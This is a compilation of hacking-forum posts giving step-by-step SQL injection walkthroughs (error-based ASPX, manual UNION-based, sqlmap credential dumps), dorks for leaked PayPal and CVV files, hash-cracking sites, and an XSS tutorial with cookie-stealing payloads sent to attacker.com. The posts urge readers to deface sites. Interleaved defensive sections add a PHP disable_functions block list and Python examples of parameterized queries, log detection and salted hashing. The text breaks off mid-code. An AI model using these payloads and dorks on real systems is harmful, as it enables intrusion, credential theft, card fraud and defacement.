Step 1:
Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx
link which looks like that

www.vulnerablesite.com/gallery.aspx?id=10

=============================
Step 2:
Checking For Vulnerability
As in the PHP based injection, we will test for
the vulnerability by adding a single quote(') at
the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error
then your site is vulnerable to asp/aspx injection.
In asp/aspx based injections, we need not find
out the number of columns
or the most vulnerable column. We will
directly find out the table
names,column names and then we will extract
the data.

=============================
Step 3:
Finding Out The Table Names.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1 table_name
from information_schema.tables))

The above code executes the second query and
retrieves the first table
name from the database. the windows server
cant convert character
value into data type. so we will get an error from which we can get the first table
name.
But this may not be the desired table for us.
So we need to find out the next table name in
the database.
For that, we will use the following query.

www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in ('first_table_name')))

Replace the first_table_name with the actual
table name we got above.
Now we will get the second table name.
Still if
You don't get our desired table,you will
continue the procedure until you
get the desired table name. Now the query
looks like that

www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in
('first_table_name','second_table_name')))

Replace first_table_name and
second_table_name with the table names we
got in the above steps.

=============================
Step 4:
Finding Out The Columns
Now we got the admin table. So we need to
find out the columns now.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from information_schema.columns where
table_name='admin_table'))

Replace admin_table with the table name we
got. In my case, it is "vw_system_admin"

If the first column is not related to our desired
column names, then follow the steps as we
have done in step 3.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from
information_schema.columns where
table_name='admin_table' and
column_name not in ('first_column_name')))

Replace first_column_name with the column
name we got.

=============================

Step 5:
Extracting The Data
After finding out all the columns, we need to
extract the data such as user names and
passwords.

For that, we use the following query

For user name:-

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_username from admin_table))

For password:-

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_password from admin_table))

Now Find Admin Panel.
& Deface It.

#Anonymous_Knw
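
The technique above depends on two defects in the application: the `id` value is concatenated into the SQL statement, and the database's conversion error is sent back to the browser. The following added example (not part of the original post) shows the concatenating lookup beside a hardened one, plus a log check for the probes shown in steps 2 and 3. SQLite stands in for the SQL Server backend, and the table, rows and log lines are constructed.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed access-log lines: date time method path query status.
SAMPLE_LOG = [
    "2015-06-01 07:44:01 GET /gallery.aspx id=10 200",
    "2015-06-01 07:44:09 GET /gallery.aspx id=10' 500",
    "2015-06-01 07:44:15 GET /gallery.aspx "
    "id=10%20and%201=convert(int,(select%20top%201%20table_name"
    "%20from%20information_schema.tables)) 500",
    "2015-06-01 07:45:02 GET /gallery.aspx id=11 200",
]

SIGNATURES = {
    "quote in numeric parameter": re.compile(r"'"),
    "type-conversion probe": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "schema enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
}


def make_db():
    """In-memory stand-in for the gallery database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO gallery VALUES (10, 'Sunset')")
    return db


def lookup_vulnerable(db, raw_id):
    """BEFORE: request value concatenated in, database error shown to the client."""
    try:
        row = db.execute("SELECT title FROM gallery WHERE id = " + raw_id).fetchone()
    except sqlite3.Error as exc:
        return 500, str(exc)          # the error text is the information leak
    return (200, row[0]) if row else (404, "not found")


def lookup_hardened(db, raw_id):
    """AFTER: strict integer validation, bound parameter, generic errors."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "bad request"
    try:
        row = db.execute("SELECT title FROM gallery WHERE id = ?",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        return 500, "internal error"  # details go to the server log only
    return (200, row[0]) if row else (404, "not found")


def scan_log(lines, param="id"):
    """Return (line_no, reasons) for requests whose numeric parameter is not numeric."""
    alerts = []
    for number, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        value = parse_qs(fields[4], keep_blank_values=True).get(param, [""])[0]
        if value.isdigit():
            continue
        reasons = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        alerts.append((number, reasons or ["non-numeric value"]))
    return alerts


if __name__ == "__main__":
    db = make_db()
    for raw in ("10", "10'"):
        print(repr(raw), lookup_vulnerable(db, raw), lookup_hardened(db, raw))
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

On ASP.NET the same two measures are parameterized commands (`SqlParameter`) and custom error pages, so that conversion errors never reach the response.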

Mastercards & Paypal Dorks

04:56 ---

intext:Email: Password: IP Address: Paypal: Date 2015: +++++++++++++++++++++++ ext:txt

filetype:txt cvv 2015: +++++++++++++++++++++++ ext:txt

intext:Email: Password: IP Address: Paypal: Date 2015: +++++++++++++++++++++++ ext:txt
-------------------------------------------------------------------
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?id="  intext:"Pay Via Debit Card"


inurl:"addtocart.php?id="

inurl:"shop-cart.php?id="


#Anonymous_KnW

SQLMAP(An Automated SQL-i Tool)

05:32 ---

Hello Readers!!

This Time I Posted About SQLMAP(An Automated SQL-i Tool)

Introduction
Sqlmap is an open source penetration
testing tool that automates the process of
detecting and exploiting SQL injection flaws
and taking over of database servers. It comes
with a powerful detection engine, many
features for the ultimate penetration tester
and a broad range of switches lasting from
database fingerprinting, over data fetching
from the database, to accessing the
underlying file system and executing
commands on the operating system via out-
of-band connections. This is all about
sqlmap.

Procedure:
Now follow These steps to hack a website using
SQLMAP.
Step 1
Find an SQL-vulnerable site.
I will give you some dorks which may help you
find websites vulnerable to SQL Injection.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=


Step 2
Test if the website is vulnerable
To test if the website is vulnerable to Sqli just
add    '     at the end of the url.
And press enter.
Now we found the target. Now let's go ahead.

Step 3
Injection

Type this command in the terminal and hit
enter
Code:
sqlmap -u "www.yourtarget.com/page.php?id=1" --dbs

Now we will get the database names of the
website.

We got two databases, ohridhot_ohrid
and information_schema; we will select the
ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command in the
terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

Now we will get the tables list which is stored
in the database we selected.

Now let's grab the columns from the admin
table, type in the terminal:
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns
Now we got the columns, and we got user and
pass like on the image below

Now let's grab the user and pass

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

This will dump all usernames & passwords

In normal cases:-
User:- Jarvis
Pass:-Iron0man

Special cases: Hashed Usernames and
Passwords
Most websites will have their passwords
hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
I'll make up a detailed tutorial on Hash
cracking soon.
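
The lookup sites listed above work because an unsalted MD5 or SHA-1 digest of a given password is always the same string. The following Python is an added example, not part of the original post (function names and the record format are assumptions): it flags stored values in the 32- and 40-character hex formats described above and shows salted PBKDF2 storage, where the same password never yields the same record twice.

```python
# Added example, not from the original post. Names and record format are assumptions.
import hashlib
import hmac
import os
import re

# Digest lengths as described on the page: 32 hex chars (MD5), 40 (SHA-1).
_HEX_LENGTHS = {32: "md5-length hex digest", 40: "sha1-length hex digest"}
PBKDF2_ITERATIONS = 600_000  # assumption: tune to your own latency budget


def classify_stored_value(value: str) -> str:
    """Flag credential columns that hold fast, unsalted hex digests."""
    value = value.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in _HEX_LENGTHS:
        return _HEX_LENGTHS[len(value)]
    if value.startswith("pbkdf2_sha256$"):
        return "salted pbkdf2"
    return "unknown or plaintext"


def unsalted_md5(password: str) -> str:
    """What the page calls 'hashed as MD5': deterministic, so precomputable."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, slow hash. Record format: scheme$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = record.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        expected = bytes.fromhex(digest_hex)
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
        )
    except ValueError:
        return False  # malformed record: treat as a failed login
    return hmac.compare_digest(candidate, expected)


def audit_rows(rows):
    """rows: (username, stored_value) pairs; returns users needing a rehash."""
    return [user for user, stored in rows
            if classify_stored_value(stored).endswith("hex digest")]
```

Accounts reported by `audit_rows` can be rehashed with `hash_password` at their next successful login, since the original password is only available at that moment.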

Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr ->
share -> sqlmap -> output(here you got output)

That's all , I hope you enjoyed the tutorial.

#Anonymous_KnW

Prevent your server from symlink

22:57 ---

Hello Guys!
This time I am posting
about
"How to prevent symlink?"
so let's start

First step:-
Open your site control Panel.
Change permission for ln command.
Code:
sudo su
cd /bin
chmod 400 ln

Second step :-
Edit the php.ini configuration.
To find the php.ini file:
Code:
locate php.ini

Edit php.ini:
Code:
nano /etc/php5/apache2/php.ini

Search for "disable_functions" and put these in the list:
Code:
disable_functions = symlink,system,shell_exec,eval,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinumcols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,ftp,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,popen,fpassthru,php_uname,pcntl_exec,

Final Step:-
Now restart the service .

Code:
/etc/init.d/php5 restart
/etc/init.d/apache2 restart

This makes your server
secure from symlink.

Thanx For Reading .

#Anonymous_KnW
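
To confirm the directive is actually in place after the restart, the `disable_functions` value can be parsed and compared against the list. This is an added example, not part of the original post: the sample php.ini text is constructed and the `REQUIRED` subset is an assumption drawn from the functions named above. It also flags `eval`, which is a language construct and is not affected by `disable_functions`.

```python
# Added example, not from the original post. Sample ini text is constructed.
import re

# Assumption: the subset of the post's list that matters most for symlink
# abuse and command execution from a PHP script.
REQUIRED = {"symlink", "system", "shell_exec", "exec", "passthru",
            "popen", "proc_open", "pcntl_exec"}
# Language constructs cannot be disabled through disable_functions.
NOT_FUNCTIONS = {"eval"}


def parse_disable_functions(ini_text):
    """Return the entries of the last active disable_functions directive."""
    entries = []
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # skip comments, including a commented-out directive
        match = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if match:
            # Drop a trailing ';' comment and optional quotes around the value.
            value = match.group(1).split(";", 1)[0].strip().strip('"')
            # A later directive overrides an earlier one.
            entries = [e.strip().lower() for e in value.split(",") if e.strip()]
    return entries


def audit(ini_text):
    """Report required functions that are missing and entries with no effect."""
    entries = set(parse_disable_functions(ini_text))
    return {
        "missing": sorted(REQUIRED - entries),
        "ineffective": sorted(entries & NOT_FUNCTIONS),
        "ok": REQUIRED <= entries,
    }


# Constructed samples: the first has only a commented-out directive and an
# empty active one, the second is a hardened line with one entry forgotten.
SAMPLE_DEFAULT = """
[PHP]
;disable_functions = symlink,exec
disable_functions =
"""
SAMPLE_HARDENED = """
[PHP]
disable_functions = symlink,system,shell_exec,eval,exec,passthru,popen,proc_open
"""

if __name__ == "__main__":
    for name, text in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED)):
        print(name, audit(text))
```

Run it against the php.ini of the SAPI that serves the site (the post edits /etc/php5/apache2/php.ini); `locate php.ini` usually lists more than one file.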

SQL injection [Manually] No Tools Required!

21:47 ---

Hello!
Now this time we discuss SQLi

SQL injection is a very common method of
hacking websites in this era..
well, sql injection is a big thing, newbies think
that this is not a big
deal, as they can exploit this vulnerability with
scripts like
sqlmap, havij, sqlninja and other kiddie scripts
but SQL injection is such a huge topic that it
could take many books to cover
So what can you DO with SQL injection
-->You can access records
-->You can modify records
-->You can bypass login areas
-->You can breach the sql server

Okay  Here
our first step begins
Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can
find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
etc there is a huge list of dorks
now if you search anyone of these.. you will
find many websites,
open any of them
and you will see url like
Code:
website.com/index.php?id=1
this could be random
okay, to test whether the site is vulnerable, just put
a ' at the end of the url
so that it looks like
Code:
website.com/index.php?id=1'
and if you see some error like
You have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server
version for the right syntax to use near '\'' at
line 1
or
Warning: mysql_fetch_array()
or any mysql error... etc or if you see any
content of page missing
then the site is vulnerable

you see it's a mysql error.. so the website is
vulnerable
So now let's move to the next step
EXPLOITING the vulnerability
so now we have found a vuln website.. it's time to
fetch secret data
so our next step is to find the
number of columns in the table
for that we replace ' with an order by statement
like
Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
we need to increase the order by number till
we get some error like
unknown column number or we find some
content missing in the page
example
Code:
http://www.corporate.com/page.php?id=20 order by 1-- no error
http://www.corporate.com/page.php?id=20 order by 2-- no error
http://www.corporate.com/page.php?id=20 order by 3-- no error
http://www.corporate.com/page.php?id=20 order by 10-- no error
Increase it one by one
http://www.corporate.com/page.php?id=20 order by 20-- no error
http://www.corporate.com/page.php?id=20 order by 21-- Error

CONTENT MISSING IN PAGE
SO NOW WE SEE THAT WE GOT AN ERROR AT
ORDER BY 21, BUT NO ERROR AT ORDER BY
20,
SO THAT MEANS WE HAVE 20 COLUMNS
sometimes this never works, we don't
get an error even at order by 1000
in that case we put ' at the end of the id /
parameter and put + at the end
like
Code:
http://www.corporate.com/page.php?id=20' order by 21--+ error

now the next step begins
Union Select
NOW, we know we have 20 columns, now it's
time to select all the columns using union
select
the select statement is used to view data, if you
want to learn more about sql, you can check
my
article on working with SQL..
okay for now
we use a statement like
Code:
http://www.corporate.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
now you will see some of the column DIGITS on the
page
like 1 5 7 or any of them
if you don't see any, place - before the parameter value
example
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
you can see in the picture below
you can see 3 and 4 on the web page .. these
two are vulnerable columns..

now it's time to retrieve data in these columns
we can retrieve sensitive data .. we can call
functions for database name database(),
version info version() or @@version, user info
user(),
concat, group_concat(), LOAD_FILE etc and
many more
okay, for the tutorial, I will call the version function
in column 3 and db and user info in
column 4 using group_concat()...
for that I will use
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
I used 0x3a because it's a hex value of
SEMICOLON ( ; ) AND it will separate two
different values of different parameters
now you can see in the image that columns 3 and
4 are now replaced with the values that I called
okay .. next thing
how to find all databases in the website ??
okay that's easy
now we need to replace the column name with a
query like this
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--

now we know there are basically two
databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema holds the system
tables which define the
databases.. we can use these tables to look at
the database layout
okay now we have our database ( we don't
need to check, we can use its value directly, if
we are trying to dump the current database
we can use
the function database() instead of
cementco_cement.. the name is needed when we are
dumping outside of the current database
but in this case we will be simply dumping)
okay, now let's find the tables in the current db
we will use a WHERE condition in this query
now
we will fetch tables with a select statement and
use the where condition to determine which
database's tables we want to fetch
okay
syntax
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

now you can see we have all the table names
which are
archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
now we are going to dump the sensitive table
which is login
okay...
let's dump it
now we will replace group_concat(table_name)
with group_concat(column_name) and
information_schema.tables with
information_schema.columns
and in the where condition we will change
table_schema to table_name
and give table_name the name
of the table in quotes, like
table_name='login'
why use quotes? because its datatype is
varchar ..
sometimes it does not work
so we have to convert it into mysql char ... for
that I use hack bar
the mysql char value of login is CHAR(108, 111,
103, 105, 110)
so now our query looks like
example
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
yeah
..now we can see the columns of table
'login'
which
are ...id,username,password,email,date_added,lastlogin,sessionid,type,status
okay... now the fun begins... time to dump
the columns...
for example if we need to dump the username and
password columns from table 'login' we will
replace the query with
select group_concat(username,0x3a,password) from login--
dumped
syntax
Code:
http://www.corporate.com/page.php?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
you can see username:password in the
webpage
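
Every step above works only because the page pastes the `id` parameter into the SQL text. As an added example that is not part of the original post (table layout and function names are constructed, and SQLite stands in for MySQL), the same UNION and ORDER BY requests are run against a concatenated query and against a bound parameter:

```python
# Added example, not from the original post. Schema and data are constructed;
# SQLite is used in place of MySQL so the block runs offline.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a content table and a login table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO pages VALUES (20, 'About us', 'Company profile');
        INSERT INTO login VALUES (1, 'Jarvis', 'Iron0man');
    """)
    return db


def get_page_vulnerable(db, raw_id: str):
    """Deliberately vulnerable: the parameter becomes part of the SQL text."""
    query = "SELECT id, title, body FROM pages WHERE id = " + raw_id
    return db.execute(query).fetchall()


def get_page_safe(db, raw_id: str):
    """Validate the type, then bind the value; it is never parsed as SQL."""
    try:
        page_id = int(raw_id, 10)
    except ValueError:
        return []  # caller renders a generic 404, no database error text
    return db.execute(
        "SELECT id, title, body FROM pages WHERE id = ?", (page_id,)
    ).fetchall()


# The request shapes from the tutorial, reduced to this table's three columns.
UNION_INPUT = "-20 union select 1, username, password from login"
ORDER_BY_PROBE = "20 order by 4--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_page_vulnerable(db, UNION_INPUT))  # login row leaks
    print("safe:      ", get_page_safe(db, UNION_INPUT))        # no rows
    print("legit:     ", get_page_safe(db, "20"))               # the real page
```

With the bound parameter the column-count probe never reaches the database, so there is no error message or missing content for the requester to observe.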

now just find admin panel and Deface it.

I hope u enjoyed the tutorial.
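
The requests in this tutorial and in the sqlmap post leave a recognisable trail in web server access logs. The detector below is an added example, not part of the original posts: the log lines are constructed, and the rule patterns and the `sqlmap` User-Agent check are assumptions about a default setup that can be changed on the client side.

```python
# Added example, not from the original posts. Log lines are constructed.
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One rule per stage of the walkthroughs; matched against the decoded query.
RULES = [
    ("quote-probe", re.compile(r"=[^&]*'")),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("error-based-convert", re.compile(r"\bconvert\s*\(\s*int\b", re.I)),
]


def classify(line: str):
    """Return (ip, [rule names]) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    if "sqlmap" in m.group("ua").lower():
        hits.append("sqlmap-user-agent")
    _, _, query = m.group("path").partition("?")
    # Decode twice so a double-encoded value is inspected as well.
    decoded = unquote_plus(unquote_plus(query))
    hits += [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), hits


def summarize(lines):
    """Map each client IP to the sorted list of rules it triggered."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            report.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(rules) for ip, rules in report.items()}


# Constructed log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2015:10:00:01 +0000] "GET /page.php?id=20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2015:10:00:05 +0000] "GET /page.php?id=20%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2015:10:00:09 +0000] "GET /page.php?id=20+order+by+21-- HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2015:10:00:20 +0000] "GET /page.php?id=-20%20union%20select%201,2,3%20from%20information_schema.tables-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2015:10:02:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]

if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE_LOG).items():
        print(ip, rules)
```

The `quote-probe` rule also matches legitimate values such as a surname with an apostrophe, so treat a single hit as a triage signal and several different rules from one client as the stronger one.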

XSS Attack [Explained]

07:21 ---

[SUMMARY ]---------------------------------------------------------------------
0x01: Introduction
0x02: Origins
0x03: Types of XSS
\_ 0x03a: DOM-Based
\_ 0x03b: Non-Persistent
\_ 0x03c: Persistent
0x04: Appendix
---------------------------------------------------------------------------------
---[ 0x01: Introduction ]
Cross-site scripting (later commonly named
XSS to distinguish it from Cascading
Style Sheets) is a type of security vulnerability
that affects web applications
whose code does not safely sanitize
input variables.
This kind of vulnerability allows an "attacker"
to inject some code into
the affected applications in order to bypass
access to the website or to apply
"phishing" on users who fall for it (which is
obviously not strictly our purpose)
As a matter of fact, on vulnerable websites it is
possible to execute HTML and
JavaScript code from an unsanitized form,
which combined can be really
dangerous: it's possible to steal cookies or to
redirect webpages to a purpose-built
fake login in order to steal login usernames
and passwords.
This is commonly an underestimated problem
among webmasters, because
XSS cannot actively compromise the website
itself, but can only exploit naive
users.
It will still take time to get webmasters
to look out for these kinds of
vulnerabilities: meanwhile we keep exploiting
them
-----------------------------------------------------------------------------
[/]
---[ 0x02: Origins ]
The name "Cross-Site Scripting" was coined by
Marc Slemko, the XSS pioneer,
and this name doesn't really reflect
all the issues of this class of
vulnerability; because of that he explained the
choice with the following answer:
"This issue isn't just about scripting, and there
isn't necessarily anything
cross-site about it. So why the name? It was
coined earlier on when the
problem was less understood, and it stuck.
Believe me, we have
had more important things to do than think of
a better name."
Touché
By the way, the name was adopted early, but
over the years it became useful to abbreviate
it to XSS in order not to confuse it with
Cascading Style Sheets and the Content Scramble
System.
Starting from the Bugtraq community, the XSS
abbreviation became more and more
common, as it is now the "official"
reference to this vulnerability, and
obviously we will conform to this
tradition
-----------------------------------------------------------------------------
[/]
---[ 0x03: Types of XSS ]
The term XSS is actually a bit elusive because
it includes different kinds of
attacks that rely on different
attacking mechanisms.
There are actually three types of Cross-Site
Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS
Let's analyze them one by one.
-----------------------------------------------------------------------------
[/]
------[ 0x03a: DOM-Based ]
DOM-Based Cross-Site Scripting allows
an attacker to work not on a victim
website but on a victim's local machine: the
various operating systems usually include
from the start some HTML pages created for
different purposes, but since humans
make mistakes, these HTML pages can often be
exploited due to code vulnerabilities.
DOM-Based XSS exploits these problems
on users' local machines in this way:
- The attacker creates a well-built malicious
website
- The naive user opens that site
- The user has a vulnerable page on his
machine
- The attacker's website sends commands to
the vulnerable HTML page
- The vulnerable local page executes those
commands with the user's privileges
on that machine.
- The attacker easily gains control of the
victim's computer.
As you can see it's quite a simple practice; it
just relies on brand new vulnerabilities
that come out over time, and there's never a
lack of them
This kind of attack is really dangerous
because it operates directly on the victim's
system, and as long as the user doesn't look
after his security and doesn't
apply updates, DOM-Based XSS will work
fine.
Solution:
To prevent this kind of attack there are only
two things to take care of:
- Don't visit untrusted websites
- Keep your system up to date
-----------------------------------------------------------------------------
[/]
------[ 0x03b: Non-Persistent ]
Non-persistent XSS vulnerabilities are actually the most
common vulnerabilities that can
be found on the Net.
It's commonly named "non-persistent"
because it works on an immediate HTTP
response from the victim website: it shows up
when the webpage takes the data provided
by the attacker's client to automatically
generate a result page for the attacker
himself.
Building on this, the attacker could provide
some malicious code and try to make
the server execute it in order to obtain some
result.
The most common application of this kind of
vulnerability is in search engines on
websites: the attacker writes some arbitrary
HTML code in the search textbox and,
if the website is vulnerable, the result page
will return the result of these
HTML entities.
If this happens, 99% of the time the search engine will
also execute arbitrary JavaScript code.
For example, assume that a website works like
this:
http://www.example.com/search.php?text=TEXTTOSEARCH
Try to include some HTML tags in the "text"
variable:
http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the
attacker's image in the result
webpage.
Then try to write some JavaScript code:
http://www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert
popup with the current cookie for the
site itself.
That's not good at all
As you will see the vulnerable website will
execute any JavaScript code you
want to be run: sometimes you can find that
the website make some filters on " "
and ' ', but that's not really a big problem for
us
This vulnerability can be used by the attacker to steal information from users of the victim website by providing them, for example, an email with a URL like:
http://www.victim.com/search.php?text=MALICIOUSCODE
To make that URL less suspicious it is useful to encode the code as URL hex values.
You can apply this technique using our Playhack - Encoder service reachable at http://encoder.playhack.net
(Beware that it's created for informational purposes only).
For example the code:
<script>alert("XSS")</script>
Encoded will look like:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
And so the malicious URL will turn from:
http://www.victim.com/search.php?text=&l...t>alert ("XSS")</script>
Into:
http://www.victim.com/search.php?text=%3...2%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Which, for a clueless user, is a lot less suspicious than the first one.
Let's analyze an example attack.
- The attacker realizes that the victim website is vulnerable to XSS
- The attacker creates on his website an ad-hoc page which is designed to steal sensitive information like cookies or to present a fake login of the victim website.
- The attacker provides a user with a crafted URL which contains malicious code like:
http://www.victim.com/search.php?text=<script>document.location("http://attackersite.com/fakelogin.php")</script>
Encoded in hex.
- The user visits the webpage and is covertly redirected to the attacker's fake login
- The user is invited to log into the system and he does.
- The fake login steals the username and password of the victim.
Solution:
The solution to this issue is simply to check the input in the website, avoiding HTML tags or accepting alphanumeric characters only, with for example code like:
- Python: html.escape(code) (cgi.escape, the older call, was removed in Python 3.8)
- PHP: preg_match("/[^a-zA-Z0-9_]/", $code) (eregi, the older call, was removed in PHP 7)
$code = htmlentities($code)
And many others.
-----------------------------------------------------------------------------
[/]
------[ 0x03c: Persistent ]
Persistent XSS vulnerabilities are similar to the second type (non-persistent XSS), because both work on a victim site and try to steal users' information; the difference is that on websites vulnerable to persistent XSS the attacker doesn't need to provide the crafted URL to the users, because the website itself permits users to insert fixed data into the system: this is the case, for example, of "guestbooks" (what an awful item !!)
Usually users use that kind of tool to leave messages to the owner of the website and at first glance it doesn't seem dangerous, but if an attacker discovers that the system is vulnerable he can insert some malicious code in his message and make ALL visitors victims of it.
This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.
The attacker could easily insert as much code as he wants into the tool, for example:
<img src="jdocument.location
('http://attacker.com/steal.php?cookie=' .
encodeURI(document.cookie));">
Which allows the attacker to steal the cookie of the victim user.
This is just one example of the many possible injections that can be done on the vulnerable site.
Persistent XSS, due to its fixed nature, is obviously more dangerous than the others, because it can easily affect lots of users with a single attack.
Solution:
The solution is the same as for non-persistent XSS.
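The solution given for both the non-persistent and the persistent case, as an added Python example that is not part of the original paper: the value is HTML-encoded when the page is built, so a hex-encoded URL gains nothing because the server decodes it before encoding. The function names and sample inputs are assumptions made for this illustration.

```python
import html
import re
from urllib.parse import parse_qs

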